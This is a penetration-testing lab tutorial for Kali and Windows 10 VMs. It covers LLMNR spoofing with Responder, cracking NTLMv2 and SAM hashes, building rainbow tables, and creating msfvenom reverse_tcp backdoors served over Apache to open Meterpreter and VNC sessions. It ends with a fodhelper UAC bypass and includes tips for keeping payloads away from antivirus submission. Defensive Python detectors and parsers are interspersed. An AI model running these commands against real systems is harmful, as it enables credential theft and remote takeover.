
🌐Network PenTesting Modules & Tools🖧

Vulnerability Scanning refers to auditing hosts, ports, and services running in a network to assess the security posture and search for security loopholes.

It assesses how exposed the organization's systems and network are to attack by evaluating them for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Vulnerability scanning is a critical component of any penetration testing assignment.

Nessus


Nessus allows you to remotely audit a network and determine whether it has been broken into or misused in some way. It can also audit a specific machine locally for vulnerabilities.

Official website: https://www.tenable.com/downloads/nessus

GFI LanGuard


GFI LanGuard is a product similar to Nessus: it scans networks and ports to detect, assess, and correct any security vulnerabilities found.

Official website: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard

Nikto


Nikto Web Scanner is a web server scanner that tests web servers for dangerous files/CGIs, outdated server software and other problems.

Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version-specific problems on over 270 servers. It also scans server configuration items such as the presence of multiple index files and HTTP server options, and attempts to identify installed web servers and software. Scan items and plugins are frequently updated and can be updated automatically. Nikto is not a stealth tool: it scans a web server in the shortest possible time, and its requests will be logged by an IDS.

Official repository: https://github.com/sullo/nikto

System Hacking

System hacking is the practice of testing computers and networks for vulnerabilities and harmful plug-ins. It is a vast subject in itself, covering the compromise of the different software-based systems such as laptops, desktops, and so on. System hacking is defined as the compromise of computer systems and software to gain access to the target computer and steal or misuse its sensitive information. Here the malicious hacker exploits weaknesses in a computer system or network to gain unauthorized access to its data or to take illegal advantage of it.

LLMNR/NBT-NS

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are two components of Microsoft Windows machines. LLMNR was introduced in Windows Vista and is the successor to NBT-NS.

When a DNS name server request fails, Windows machines fall back to Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS). If the name still remains unresolved, Windows performs an unauthenticated UDP broadcast to the whole network. Any masquerading machine claiming to be the server can then send a response and capture the target's credentials during the authentication process that follows.

LLMNR/NBT-NS spoofing is a classic internal network attack that still works, due to low awareness and the fact that both protocols are enabled by default in Windows.

LLMNR spoofing

LLMNR and NBT-NS are enabled by default in Windows and can be abused to extract a user's password hashes. There is a good chance of acquiring user credentials this way on an internal network.

By listening for LLMNR/NBT-NS broadcast requests, an attacker can spoof the requested host and send a response claiming to be the legitimate server. Once the victim system accepts the connection, the victim's user credentials can be obtained with a tool like Responder.py.
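The canary-name technique is the usual way to detect this attack from the blue side: resolve hostnames that do not exist on the network, and treat any answer as a spoofer. The Python below is an added example, not part of this guide or of Responder; it parses LLMNR messages (which reuse the DNS wire format, on UDP 5355) and flags responses for canary names. The two packets, the canary name canary-fs01 and the answering address 10.0.2.42 are constructed for the demo.

```python
import ipaddress
import struct

# LLMNR (UDP 5355, multicast 224.0.0.252) reuses the DNS message layout:
# a 12-byte header, then question and resource-record sections.
HEADER = struct.Struct("!6H")      # ID, FLAGS, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
QR_RESPONSE = 0x8000               # QR bit set means the packet is a response
MAX_POINTER_JUMPS = 8              # guard against crafted compression-pointer loops


def _read_name(pkt, offset):
    """Decode a DNS-style name at `offset`, following compression pointers.
    Returns (name, offset just past the name as it appeared at the call site)."""
    labels, end, jumps = [], None, 0
    while True:
        length = pkt[offset]
        if length & 0xC0 == 0xC0:              # 11xxxxxx: pointer to an earlier offset
            if end is None:
                end = offset + 2
            jumps += 1
            if jumps > MAX_POINTER_JUMPS:
                raise ValueError("too many compression pointers")
            offset = struct.unpack_from("!H", pkt, offset)[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:                        # root label terminates the name
            return ".".join(labels), (end if end is not None else offset)
        labels.append(pkt[offset:offset + length].decode("ascii", "replace"))
        offset += length


def parse_llmnr(pkt):
    """Parse one LLMNR message into transaction id, direction, questions and A answers."""
    txid, flags, qdcount, ancount, _ns, _ar = HEADER.unpack_from(pkt, 0)
    offset = HEADER.size
    questions, answers = [], []
    for _ in range(qdcount):
        name, offset = _read_name(pkt, offset)
        qtype, _qclass = struct.unpack_from("!HH", pkt, offset)
        offset += 4
        questions.append((name, qtype))
    for _ in range(ancount):
        name, offset = _read_name(pkt, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", pkt, offset)
        offset += 10
        rdata = pkt[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:          # A record: 4-byte IPv4 address
            answers.append((name, str(ipaddress.IPv4Address(rdata))))
    return {"id": txid, "is_response": bool(flags & QR_RESPONSE),
            "questions": questions, "answers": answers}


def detect_spoof(pkt, src_ip, canary_names):
    """Return alert strings for an LLMNR *response* that answers a canary name.
    Canary names do not exist on the network, so the only host that will ever
    answer for them is a spoofer."""
    msg = parse_llmnr(pkt)
    if not msg["is_response"]:
        return []
    canaries = {c.lower() for c in canary_names}
    return [f"LLMNR spoofing suspected: {src_ip} answered canary '{name}' with {ip}"
            for name, ip in msg["answers"] if name.lower() in canaries]


# Constructed sample packets (not captured traffic): a query for the canary
# name "canary-fs01", and the response a spoofer would send for it.
SAMPLE_QUERY = bytes.fromhex(
    "1234" "0000" "0001" "0000" "0000" "0000"           # header: query, 1 question
    "0b" "63616e6172792d66733031" "00"                    # label 11 "canary-fs01", root
    "0001" "0001")                                        # QTYPE=A, QCLASS=IN
SAMPLE_RESPONSE = bytes.fromhex(
    "1234" "8000" "0001" "0001" "0000" "0000"           # header: response, 1 answer
    "0b" "63616e6172792d66733031" "00" "0001" "0001"    # echoed question
    "c00c" "0001" "0001" "0000001e" "0004" "0a00022a")  # name ptr, A, IN, TTL 30, 10.0.2.42

if __name__ == "__main__":
    for alert in detect_spoof(SAMPLE_RESPONSE, "10.0.2.42", ["canary-fs01"]):
        print(alert)
```

In a deployment the packets come from a socket joined to the 224.0.0.252 multicast group, and the canary queries are sent from a few monitored hosts on a schedule; NBT-NS (UDP 137) encodes names differently and needs its own decoder.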

Objectives

  • Perform LLMNR/NBT-NS spoofing attack.

Requisites

  • Windows 10 virtual machine.
  • Kali Linux virtual machine.

Using Responder


  1. Launch and log in to the Windows 10 machine. (Make sure to select a common password that 'non-tech' people would use, e.g. qwerty).
  2. Go to Kali Linux and open the Terminal window.
  3. Start Responder listening on the network interface. (You can type responder -h to see the options available).

responder -I eth0

  4. Now go back to the Windows 10 machine and let's assume that you want to access a shared network drive on your network. Launch Run and type:

\\ceh-tools


Obtaining and Cracking the Hashes

On the Kali machine, Responder starts capturing the Windows 10 machine's authentication attempts:


  1. Go to /usr/share/responder/logs/ and open the last file created by responder:

SMB-NTLMv2-SSP-10.0.2.39.txt


These are the hashes of the logged-in user collected by Responder. Now let's crack them.

To crack the passwords we will use JohnTheRipper.

  1. Open a new Terminal window and type john followed by the path to the Responder logs plus the name of your log file (note that the file name may differ in your lab environment):

john /usr/share/responder/logs/SMB-NTLMv2-SSP-10.0.2.39.txt

Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
qwerty           (Dummy)
qwerty           (Dummy)
qwerty           (Dummy)
qwerty           (Dummy)
4g 0:00:00:00 DONE 2/3 (2019-12-11 13:51) 26.66g/s 357713p/s 378293c/s 378293C/s 123456..random
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

The cracked password of the Dummy user (qwerty) is shown in the output above.
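For an incident responder, a Responder log is evidence as much as it is cracking input. The Python parser below is an added example (not Responder's or John's code) that splits a captured NetNTLMv2 line into its fields and decodes the blob's timestamp and target information. The sample line is constructed: it reuses the DESKTOP-ICB2IQ4 host name from this lab, and the challenge and NTProofStr values are made up.

```python
import struct
from datetime import datetime, timedelta, timezone

# Responder logs each NetNTLMv2 capture as one line in the layout John and
# hashcat accept:  USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB  (hex fields).
# NTPROOFSTR is an HMAC-MD5 keyed with a value derived from the user's NT hash,
# which is why a candidate password can be checked offline. The BLOB itself
# (MS-NLMP NTLMv2_CLIENT_CHALLENGE) is sent unencrypted and carries a timestamp
# plus AV_PAIRs naming the target the client believed it was reaching.

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp"}
UTF16_AVS = {1, 2, 3, 4, 5}


def parse_blob(blob_hex):
    """Decode the NTLMv2 client-challenge blob into timestamp, client challenge and AV_PAIRs."""
    data = bytes.fromhex(blob_hex)
    if data[0] != 1 or data[1] != 1:                 # RespType / HiRespType must both be 1
        raise ValueError("not an NTLMv2 blob")
    filetime, client_challenge = struct.unpack_from("<Q8s", data, 8)
    when = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)  # FILETIME: 100 ns units
    av_pairs, offset = {}, 28                        # AV_PAIR list starts after the fixed fields
    while True:
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        if av_id == 0:                               # MsvAvEOL
            break
        value = data[offset:offset + av_len]
        offset += av_len
        av_pairs[AV_NAMES.get(av_id, f"AvId{av_id}")] = (
            value.decode("utf-16-le") if av_id in UTF16_AVS else value.hex())
    return {"timestamp": when, "client_challenge": client_challenge.hex(), "av_pairs": av_pairs}


def parse_responder_line(line):
    """Split one Responder/John-format NetNTLMv2 line into its fields."""
    user, _empty, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":", 5)
    return {"user": user, "domain": domain, "server_challenge": server_challenge,
            "nt_proof": nt_proof, "blob": parse_blob(blob_hex)}


def summarize_captures(text):
    """One tuple per capture: user, domain, timestamp, and the target name the client asked for."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_responder_line(line)
        av = rec["blob"]["av_pairs"]
        rows.append((rec["user"], rec["domain"], rec["blob"]["timestamp"].isoformat(),
                     av.get("NbComputerName", "?")))
    return rows


def _av_pair(av_id, text):
    """Constructed AV_PAIR for the sample below (little-endian id, length, UTF-16LE value)."""
    value = text.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(value)).hex() + value.hex()


# Constructed sample line in Responder's format (values chosen for the demo, not captured).
SAMPLE_BLOB = ("0101" "0000" "00000000"           # RespType, HiRespType, reserved
               "007a38052ab0d501"                  # FILETIME for 2019-12-11 13:51:00 UTC, little-endian
               "aabbccddeeff0011"                  # client challenge
               "00000000"                          # reserved
               + _av_pair(1, "DESKTOP-ICB2IQ4") + _av_pair(2, "WORKGROUP")
               + "00000000" "00000000")            # MsvAvEOL, then trailing zero padding
SAMPLE_LINE = ("Dummy::DESKTOP-ICB2IQ4:1122334455667788:"
               "00112233445566778899aabbccddeeff:" + SAMPLE_BLOB)

if __name__ == "__main__":
    for row in summarize_captures(SAMPLE_LINE):
        print(row)
```

The timestamp and target name come straight from the victim's own response, so they date the capture and show which share name was requested without any cracking at all.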

Dumping and Cracking SAM hashes to Extract Plaintext passwords

Pwdump7 can be used to dump the password hashes held in the protected SAM file. Ophcrack is a free open source (GPL) program that cracks Windows passwords from LM hashes using rainbow tables.

SAM (Security Account Manager) is a database file present on Windows machines that stores user accounts and security descriptors for users on the local computer. It stores users' passwords in hashed form (as LM and NTLM hashes). Because a hash function is one-way, this provides some measure of security for the stored passwords.

You need administrator access to dump the contents of the SAM file. Assessing password strength is a critical milestone during a security assessment engagement. You will start your password assessment with a simple SAM hash dump and run it through a hash cracker to uncover plaintext passwords.

Objectives

  • Use the pwdump7 tool to extract password hashes.
  • Use the Ophcrack tool to crack the passwords and obtain plain text passwords.

Requisites

  • Windows 10 machine.

Tools

  1. Ophcrack
  2. Pwdump7

Generate Hashes

  1. Before anything else, we need to find the user IDs (SIDs) associated with the Windows 10 usernames.
  2. Launch the Command Prompt in Administrator mode and type:

wmic useraccount get name,sid > c:/users.txt

This command writes the usernames and their respective SIDs to users.txt. Make a note of each SID for the next steps.

  3. To gather the password hashes, go to the pwdump7 folder and execute the .exe file:

cd C:\Users\Dummy\Desktop\pwdump7

PwDump7.exe

To save this output to an external .txt file, type:

PwDump7.exe > c:\hashes.txt

Now place the usernames before their respective SIDs, as gathered in step 2, and save the file.

Using Ophcrack to crack the hashes

  1. Launch the Ophcrack application.
  2. Click on Load and select PWDUMP file.


  3. Next, you will need to download tables to perform the cracking. Select Vista free to download.
  4. Go back to Ophcrack and click the Tables menu to load the table.
  5. In the Table Selection window, select Vista free and click OK.

This table_vista_free is a pre-computed table for reversing cryptographic hash functions and recovering plaintext passwords up to a certain length. Once installed, table_vista_free appears under the name Vista free, marked with a green bullet.

  6. Click Crack on the menu bar. Ophcrack begins to crack the passwords; this will take a few minutes.

Rainbow Tables

RainbowCrack is a computer program that generates rainbow tables for use in password cracking.

RainbowCrack Documentation

Overview of Rainbow Tables

A rainbow table is a pre-computed table for reversing cryptographic hash functions, typically used for cracking password hashes. Tables are usually used to recover plaintext passwords consisting of a limited set of characters, up to a certain length.

Objectives

  • A short introduction to rainbow tables, and using them to crack hashes and obtain plaintext passwords.

Generate Rainbow Table

Rainbow tables can either be downloaded or generated manually with rtgen, which comes with the rainbowcrack package.

Install RainbowCrack CLI version:

sudo apt-get install rainbowcrack

GUI version: https://project-rainbowcrack.com/

Usage example: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

Parameters

hash_algorithm

Rainbow tables are hash-algorithm specific: a table for a certain hash algorithm only helps to crack hashes of that type. The rtgen program natively supports many hash algorithms such as lm, ntlm, md5, sha1, mysqlsha1, halflmchall, ntlmchall, oracle-SYSTEM and md5-half. In the example below, we generate md5 rainbow tables that speed up cracking of md5 hashes.

charset

The charset includes all possible characters for the plaintext. "loweralpha-numeric" stands for "abcdefghijklmnopqrstuvwxyz0123456789", which is defined in configuration file charset.txt.

plaintext_len_min plaintext_len_max

These two parameters limit the plaintext length range of the rainbow table. In the example below, the plaintext length range is 1 to 7, so plaintexts like "a" and "abcdefg" are likely contained in the generated table, but the plaintext "abcdefgh" of length 8 will not be.

table_index

The table_index parameter selects the reduction function: rainbow tables with different table_index values use different reduction functions.

chain_len

This is the rainbow chain length. A longer rainbow chain stores more plaintexts but takes longer to generate.

chain_num

The number of rainbow chains to generate. A rainbow table is simply an array of rainbow chains; each chain takes 16 bytes.

part_index

To store a large rainbow table in many smaller files, use a different number in this parameter for each part and keep all other parameters identical.

Example:

rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0

The CPU will be busy computing rainbow chains. On a system with a multi-core processor, all cores are fully utilized.

To pause table generation, just press Ctrl+C and rtgen will exit. The next time rtgen is executed with exactly the same parameters, table generation resumes.

This command takes hours to complete on an ordinary processor.

After generating the rainbow table you need to sort it. RainbowCrack comes with the rtsort program, which sorts the rainbow chains by end point so that rcrack can binary-search them.

rtsort *.rt

Cracking

To display the usage and options just type rcrack.

usage: ./rcrack path [path] [...] -h hash
       ./rcrack path [path] [...] -l hash_list_file
       ./rcrack path [path] [...] -lm pwdump_file
       ./rcrack path [path] [...] -ntlm pwdump_file
path: directory where rainbow tables (*.rt, *.rtc) are stored
-h hash:           load single hash
-l hash_list_file: load hashes from a file, each hash in a line
-lm pwdump_file:   load lm hashes from pwdump file
-ntlm pwdump_file: load ntlm hashes from pwdump file

implemented hash algorithms:
    lm HashLen=8 PlaintextLen=0-7
    ntlm HashLen=16 PlaintextLen=0-15
    md5 HashLen=16 PlaintextLen=0-15
    sha1 HashLen=20 PlaintextLen=0-20
    sha256 HashLen=32 PlaintextLen=0-20

examples:
    ./rcrack . -h 5d41402abc4b2a76b9719d911017c592
    ./rcrack . -l hash.txt
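To make the rtgen parameters and the rtsort/rcrack steps above concrete, here is a toy rainbow table in Python. It is an added example written for this guide, not RainbowCrack's code: the reduction function and the in-memory layout are simplified choices of my own, and the demo parameters (lower-case charset, length 1 to 3, table_index 0, chain_len 40, 3000 chains) are chosen so it runs in a few seconds rather than hours.

```python
import bisect
import hashlib


class RainbowTable:
    """Toy MD5 rainbow table with rtgen's parameters (charset, plaintext length
    range, table_index, chain_len) and rtsort/rcrack behaviour. Constructed for
    illustration; rtgen's real reduction function and file format differ."""

    def __init__(self, charset, len_min, len_max, table_index, chain_len):
        self.charset, self.len_min, self.len_max = charset, len_min, len_max
        self.table_index, self.chain_len = table_index, chain_len
        base = len(charset)
        self.keyspace = sum(base ** n for n in range(len_min, len_max + 1))
        self.chains = []            # (end_point, start_point) pairs, sorted by end_point

    def _index_to_plaintext(self, n):
        """Bijection from [0, keyspace) onto plaintexts of every allowed length."""
        base = len(self.charset)
        for length in range(self.len_min, self.len_max + 1):
            if n < base ** length:
                chars = []
                for _ in range(length):
                    chars.append(self.charset[n % base])
                    n //= base
                return "".join(reversed(chars))
            n -= base ** length
        raise ValueError("index outside keyspace")

    def _reduce(self, digest, position):
        """Reduction function: maps a digest back into plaintext space. Mixing in
        the chain position is what makes the table 'rainbow' (it limits chain
        merges); table_index gives each table a different function family."""
        n = int.from_bytes(digest, "big") + position * 0x9E3779B1 + self.table_index
        return self._index_to_plaintext(n % self.keyspace)

    def _step(self, plaintext, position):
        return self._reduce(hashlib.md5(plaintext.encode()).digest(), position)

    def plaintext_at(self, chain_index, position):
        """Regenerate a stored chain from its start point up to `position`."""
        p = self.chains[chain_index][1]
        for pos in range(position):
            p = self._step(p, pos)
        return p

    def generate(self, chain_num):
        """rtgen + rtsort: build chain_num chains, keep only their end points, sort."""
        for i in range(chain_num):
            start = self._index_to_plaintext((i * 0x9E3779B1) % self.keyspace)
            p = start
            for pos in range(self.chain_len):
                p = self._step(p, pos)
            self.chains.append((p, start))
        self.chains.sort()          # sorted by end point so lookup can binary-search

    def lookup(self, target_hex):
        """rcrack: assume the target sits at each position of some chain, walk to
        that chain's end, binary-search it, and confirm by regenerating the chain."""
        target = bytes.fromhex(target_hex)
        ends = [end for end, _ in self.chains]
        for pos in range(self.chain_len - 1, -1, -1):
            p = self._reduce(target, pos)
            for later in range(pos + 1, self.chain_len):
                p = self._step(p, later)
            i = bisect.bisect_left(ends, p)
            while i < len(ends) and ends[i] == p:      # every chain with this end point
                candidate = self.plaintext_at(i, pos)
                if hashlib.md5(candidate.encode()).digest() == target:
                    return candidate
                i += 1                                   # false alarm: end points collided
        return None


def demo():
    """Build a small table, recover a value known to lie on one of its chains,
    and show a miss for a plaintext outside the charset. Returns (expected, found, miss)."""
    table = RainbowTable("abcdefghijklmnopqrstuvwxyz", 1, 3, table_index=0, chain_len=40)
    table.generate(chain_num=3000)
    covered = table.plaintext_at(0, 10)                   # guaranteed to be in the table
    found = table.lookup(hashlib.md5(covered.encode()).hexdigest())
    miss = table.lookup(hashlib.md5(b"ABC").hexdigest())  # upper case is not in the charset
    return covered, found, miss


if __name__ == "__main__":
    print(demo())
```

demo() deliberately picks a plaintext that lies on one of the table's own chains, so the lookup must succeed; for an arbitrary password the coverage is probabilistic, which is why rtgen users generate several tables with different table_index values. Note also why the technique only works against unsalted, fast hashes such as LM, NTLM and raw MD5: a per-user salt makes each hash a different function to precompute, and a slow password hash makes chain generation impractical.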

L0phtCrack

L0phtCrack is a password auditing tool that contains features such as scheduling, hash extraction from 64-bit Windows versions, multiprocessor algorithms, and network monitoring and decoding. It can import and crack UNIX password files from remote Windows machines.

Free Trial: https://www.l0phtcrack.com/
Documentation: https://www.l0phtcrack.com/doc/

Useful links:

https://project-rainbowcrack.com/documentation.htm

https://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/

https://asecuritysite.com/encryption/lmhash

 

Exploiting Client Side Vulnerabilities and Establishing a VNC session

Attackers use client-side vulnerabilities to exploit unpatched software, thereby attaining access to the machine on which the software is installed.

VNC enables attackers to remotely access and control targeted computers from another computer or mobile device, wherever they are in the world. At the same time, it is also used by administrators and organizations in every industry sector for a range of scenarios and use cases, including providing IT desktop support to colleagues and friends, and accessing systems and services on the move.

Objectives

  • How to exploit client-side vulnerabilities and establish a VNC session.

Requisites

  • Kali Linux virtual machine (Attacker).
  • Windows 10 virtual machine (Target).

Launch Metasploit Framework

Launch Kali Linux and open the Terminal window and type:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.0.2.42 LPORT=444 -o /root/Desktop/Test.exe

Note: LHOST is the IP address of your Kali machine.

This command generates Test.exe, a malicious file on the Desktop, as shown below:

No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/Desktop/Test.exe

You can also try this by using the msfconsole.

To check the malicious file that you created, go to https://nodistribute.com/ or https://antiscan.me and upload the file:


This site scans the file against the databases of more than 20 antivirus products. Do not upload your backdoors or any file to VirusTotal.

Share the malicious file on target

Now create a directory to share this file with the target machine, set its permissions, and copy the file from the Desktop to the shared location:

Create a directory in the html folder:
mkdir /var/www/html/share/

Change the mode for the share to 755:
chmod -R 755 /var/www/html/share/

Change the ownership of that folder to www-data:
chown -R www-data:www-data /var/www/html/share/

Now copy the malicious file to the shared location:
cp /root/Desktop/Test.exe /var/www/html/share/

Next, start the apache service:
service apache2 start

Open a new terminal window and type msfconsole to launch Metasploit Framework.

Use the multi/handler to capture the session.

msfconsole

In msfconsole:

  1. use multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set the LHOST to your Kali IP address and LPORT to 444
  4. run the exploit

Reverse TCP

A reverse shell (also known as a connect-back) is the exact opposite of a bind shell: it requires the attacker to set up a listener first on their box; the target machine acts as a client connecting to that listener, and finally the attacker receives the shell.

This exploit targets a memory corruption vulnerability within Microsoft's HTML engine (mshtml): when parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused.

On Windows machine

Remember to deactivate all Windows Defender settings.

Launch the browser, type the IP address of the Kali machine that is running the Apache web server, and download Test.exe.

In my case it is http://10.0.2.42/share


Double click Test.exe.
You will get a Security Warning window, click run.


Meterpreter

Switch to the Kali Linux machine and check whether a session has been opened in the Meterpreter shell, as shown below:


Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.

Useful commands: https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

About Meterpreter: https://doubleoctopus.com/security-wiki/threats-and-tools/meterpreter/

Remote View in Kali Linux

Now, you can create a VNC session on Windows 10 machine remotely by typing:

run vnc

This command will open a VNC session of the Target's machine as shown below:


Useful links:

  1. Metasploit Cheat Sheet - SANS
  2. Meterpreter Cheat Sheet
  3. Msfvenom Cheat Sheet

 

Escalating Privileges

Privilege escalation is the act of exploiting a bug, configuration flaw, or design oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

Once attackers gain access to the target system, they start looking for ways to escalate their privileges on it. They can exploit a vulnerability, design flaw or configuration oversight in the OS or in software applications on the target system to gain elevated access to resources that are normally protected from an application or user. Privilege escalation can be vertical or lateral.

Objectives

  • Demonstrate how to escalate privileges on a victim machine by exploiting its vulnerabilities.

Requisites

  • Kali Linux virtual machine.
  • Windows 10 virtual machine.

Create a Backdoor

To create the malicious executable file, type this command and put your Kali IP address on LHOST option:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.0.2.42 -f exe > Desktop/Exploit.exe

This command creates a Windows executable named Exploit.exe and saves it on the Kali desktop.


Share the Exploit.exe file

First off, we need to set up the Apache configuration and the shared folder.

Apache configuration

If you don't have apache2 installed, run apt-get install apache2.

Open the apache2.conf configuration file:
vim /etc/apache2/apache2.conf

Add a new line with the directive ServerName localhost and save the file.


Create a new directory inside html folder:
mkdir /var/www/html/share/

Change the mode for the share to 755:
chmod -R 755 /var/www/html/share/

Change the ownership of that folder to www-data:
chown -R www-data:www-data /var/www/html/share/

To verify the directory's permissions and ownership, type:
ls -la /var/www/html/ | grep share

drwxr-xr-x 2 www-data www-data  4096 Dec 18 20:52 share

Now copy the malicious file to the shared location:
cp /root/Desktop/Exploit.exe /var/www/html/share/

Start the apache service to run the http server:
service apache2 start

Perform Exploitation

Start the Metasploit Framework by typing:

msfconsole

Select the multi/handler and set the payload to meterpreter/reverse_tcp:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Set the LHOST to the Kali IP address:

set LHOST 10.0.2.42

Start the exploit on background:

exploit -j -z

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.0.2.42:4444

Run the Exploit

Switch to the Windows 10 machine, launch the browser and type the URL:

http://10.0.2.42/share/ (change to the IP address of your Kali machine).


Click Exploit.exe to download the backdoor file. Once the file is downloaded navigate to the download location and open the file to execute.

If an Open File - Security Warning window appears, click Run.


Switch back to the Kali machine. A Meterpreter session has been opened, as shown below:

[*] Sending stage (180291 bytes) to 10.0.2.15
[*] Meterpreter session 1 opened (10.0.2.42:4444 -> 10.0.2.15:49804) at 2019-12-18 21:04:09 -0500

To list the current sessions, use the command sessions (or sessions -l). To interact with a session, give its ID (equivalent to sessions -i <ID>):

sessions <ID>


Establish a Session

[+] Meterpreter Cheat Sheet

Open the current Meterpreter session and type:

getuid

meterpreter > getuid

Server username: DESKTOP-ICB2IQ4\dummy

You will notice that the Meterpreter server is running with normal user privileges. You will not be able to execute commands that require administrative/root privileges (such as hashdump, which dumps the user account hashes located in the SAM file, or clearev, which clears the event logs remotely).

Let's check this out by executing this command:

run post/windows/gather/smart_hashdump

meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against DESKTOP-ICB2IQ4
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20191218220106_default_10.0.2.15_windows.hashes_986306.txt
[-] Insufficient privileges to dump hashes!
[-] Insufficient privileges to dump hashes!

The command fails to dump the hashes from the SAM file of the Windows 10 machine and returns an error stating "Insufficient privileges to dump hashes".

From this, it is evident that the Meterpreter server requires admin privileges to perform such actions.

Now, we can try to escalate privileges by issuing the getsystem command, which attempts to elevate the user's privileges:

getsystem -t 1

which uses the Service - Named Pipe Impersonation (In Memory/Admin) technique.

meterpreter > getsystem -t 1
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)

The command fails to escalate privileges and returns an error (Access is denied).

From the above result, it is evident that the security configuration of the Windows 10 machine is blocking you from gaining unrestricted access to it.

Perform Privilege Escalation

We can try to bypass the User Account Control setting that is blocking you from gaining unrestricted access to the machine.

Move the current Meterpreter session to the background by typing background.

Use the bypassuac_fodhelper exploit for Windows:
use exploit/windows/local/bypassuac_fodhelper

Type options to see the configuration; you will observe that there is only the SESSION setting. Type sessions to see the ID of the previous Meterpreter session and set it on the current exploit:

set SESSION <ID>

Type run to exploit:

run

The BypassUAC exploit has successfully bypassed the UAC setting on the Windows 10 machine and another Meterpreter session has opened.
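From the defender's side this bypass is noisy in the registry. The Python below is an added example, not part of Metasploit or of this guide: it scans Sysmon Event ID 13 (registry value set) records for writes under a user's ms-settings\shell\open\command key, which is the per-user key the fodhelper technique plants its command and DelegateExecute value in before launching the auto-elevating fodhelper.exe. The events are constructed for the demo (placeholder SID, and the Exploit.exe path taken from this lab).

```python
import xml.etree.ElementTree as ET

# Sysmon records registry writes as Event ID 13 (RegistryEvent: value set).
# The fodhelper UAC bypass writes a command under the current user's
# ms-settings ProgID plus an empty DelegateExecute value; no legitimate
# software normally touches that key in a user hive, so it is a high-signal
# detection. Key path from public documentation of the technique; the
# sample events below are constructed, not a real log export.
EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
WATCHED_KEY = r"\software\classes\ms-settings\shell\open\command"


def parse_sysmon_event(xml_text):
    """Return (event_id, {Data Name: value}) for one exported Sysmon event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", EVENT_NS).text)
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", EVENT_NS)}
    return event_id, data


def detect_fodhelper_bypass(events_xml):
    """Flag Event ID 13 writes under the ms-settings command key in any user hive."""
    alerts = []
    for xml_text in events_xml:
        event_id, data = parse_sysmon_event(xml_text)
        if event_id != 13:
            continue
        target = data.get("TargetObject", "")
        if WATCHED_KEY in target.lower():
            alerts.append({"image": data.get("Image", ""), "target": target,
                           "details": data.get("Details", "")})
    return alerts


def _event(event_id, image, target, details):
    """Build a constructed Sysmon-style event for the demo."""
    return (f'<Event xmlns="{EVENT_NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f'<EventData><Data Name="EventType">SetValue</Data><Data Name="Image">{image}</Data>'
            f'<Data Name="TargetObject">{target}</Data><Data Name="Details">{details}</Data>'
            f'</EventData></Event>')


SID = "S-1-5-21-0-0-0-1001"        # placeholder SID, not from a real machine
SAMPLE_EVENTS = [
    _event(13, r"C:\Windows\explorer.exe",
           rf"HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
           "DWORD (0x00000001)"),                        # benign: Explorer saving a view setting
    _event(13, r"C:\Users\dummy\Downloads\Exploit.exe",
           rf"HKU\{SID}\Software\Classes\ms-settings\shell\open\command\DelegateExecute",
           "(Empty)"),
    _event(13, r"C:\Users\dummy\Downloads\Exploit.exe",
           rf"HKU\{SID}\Software\Classes\ms-settings\shell\open\command\(Default)",
           "cmd.exe /c constructed-placeholder"),
    _event(1, r"C:\Windows\System32\fodhelper.exe",
           "", ""),                                      # process creation, not a registry event
]

if __name__ == "__main__":
    for alert in detect_fodhelper_bypass(SAMPLE_EVENTS):
        print(alert)
```

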